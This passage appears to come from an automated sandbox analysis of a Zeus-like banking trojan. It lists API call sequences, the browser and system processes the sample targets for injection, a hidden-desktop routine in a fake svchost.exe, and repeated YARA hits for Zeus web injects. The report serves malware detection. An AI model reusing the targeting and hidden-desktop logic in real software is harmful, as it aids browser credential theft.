ead,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \iexplore.exe	8_2_00E867D0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \firefox.exe	8_2_00E867D0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \tbb-firefox.exe	8_2_00E867D0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe	8_2_00E867D0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe	8_2_00E867D0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: GetCommandLineA,StrStrIA,memset,#680,LoadLibraryExA,GetProcAddress,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,strstr,strstr,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree, \iexplore.exe	8_2_00E81660
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: memset,GetModuleFileNameA,InitializeCriticalSection,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA, iexplore.exe\|opera.exe\|java.exe\|javaw.exe\|explorer.exe\|isclient.exe\|intpro.exe\|ipc_full.exe\|mnp.exe\|cbsmain.dll\|firefox.exe\|clmain.exe\|core.exe\|maxthon.exe\|avant.exe\|safari.exe\|svchost.exe\|chrome.exe\|notepad.exe\|rundll32.exe\|netscape.exe\|tbb-firefox.exe\|frd.ex	8_2_00E737E0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: memset,GetModuleFileNameA,InitializeCriticalSection,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA, iexplore.exe\|opera.exe\|java.exe\|javaw.exe\|explorer.exe\|isclient.exe\|intpro.exe\|ipc_full.exe\|mnp.exe\|cbsmain.dll\|firefox.exe\|clmain.exe\|core.exe\|maxthon.exe\|avant.exe\|safari.exe\|svchost.exe\|chrome.exe\|notepad.exe\|rundll32.exe\|netscape.exe\|tbb-firefox.exe\|frd.ex	8_2_00E737E0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: memset,GetModuleFileNameA,InitializeCriticalSection,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA, iexplore.exe\|opera.exe\|java.exe\|javaw.exe\|explorer.exe\|isclient.exe\|intpro.exe\|ipc_full.exe\|mnp.exe\|cbsmain.dll\|firefox.exe\|clmain.exe\|core.exe\|maxthon.exe\|avant.exe\|safari.exe\|svchost.exe\|chrome.exe\|notepad.exe\|rundll32.exe\|netscape.exe\|tbb-firefox.exe\|frd.ex	8_2_00E737E0

Source: C:\Windows\apppatch\svchost.exe

Code function: 2_2_02D09360 CreateDesktopA,SetThreadDesktop,memset,SHGetFolderPathA,PathAppendA,CreateProcessA,GetShellWindow,GetShellWindow,Sleep,Sleep,GetShellWindow,GetHandleInformation,CloseHandle,GetHandleInformation,CloseHandle,GetDesktopWindow,FindWindowA,RegisterWindowMessageA,CreateThread,GetHandleInformation,CloseHandle,SetThreadDesktop,memset,SHGetFolderPathA,PathAppendA,CreateProcessA,GetShellWindow,GetShellWindow,Sleep,Sleep,GetShellWindow,GetHandleInformation,GetHandleInformation,CloseHandle,GetHandleInformation,CloseHandle,GetDesktopWindow,FindWindowA,CreateThread,GetHandleInformation,CloseHandle,SetEvent,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,

2_2_02D09360

System Summary

Malicious sample detected (through community Yara rule)

Source: 19.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.1452000.2.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3a40000.38.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3a40000.18.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 12.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.14b0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 38.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.2900000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.2.svchost.exe.2915c00.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.2.svchost.exe.2d63c00.6.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3a40000.22.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3a40000.39.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3a40000.10.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 8.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.c52000.1.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0.2.roundwood.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 19.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.14b0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 23.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.2922000.2.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0.3.roundwood.exe.6bff18.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0.3.roundwood.exe.6bf318.0.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3a40000.14.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.2.svchost.exe.2915c00.3.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 27.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.2da0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3a40000.21.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 15.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.960000.2.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 38.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.2900000.3.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.2.svchost.exe.28c2000.4.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 27.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.29f2000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3a40000.21.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3a40000.36.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3a40000.12.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 25.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.8e2000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3a40000.39.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3a40000.31.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2dc0000.43.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2dc0000.44.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2dc0000.44.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 31.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.25d0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3c20000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3a40000.22.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3a40000.36.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2970000.6.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3a40000.17.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 8.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.e70000.3.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3a40000.20.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3a40000.14.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 29.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.2922000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 29.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.2d00000.3.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0.3.roundwood.exe.6ba318.2.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3a40000.17.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3a40000.27.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3a40000.25.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0.2.roundwood.exe.407000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 36.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.28c2000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0.2.roundwood.exe.407000.2.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 5.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.dd2000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3a40000.13.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.2.svchost.exe.2d00000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.2.svchost.exe.28c2000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2970000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3c20000.9.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3a40000.24.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 34.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.2950000.3.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 36.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.2c90000.3.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0.3.roundwood.exe.6ba318.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 5.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.e30000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3a40000.23.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3a40000.28.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3a40000.40.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.88e000.2.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 12.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.14b0000.3.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 4.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.12e0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3a40000.35.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 12.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.1412000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3a40000.32.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 15.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.902000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.893000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3a40000.37.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 34.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.2950000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 4.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.1242000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 15.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.902000.1.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3a40000.11.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3a40000.33.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3a40000.24.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3a40000.25.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 31.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.2412000.2.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
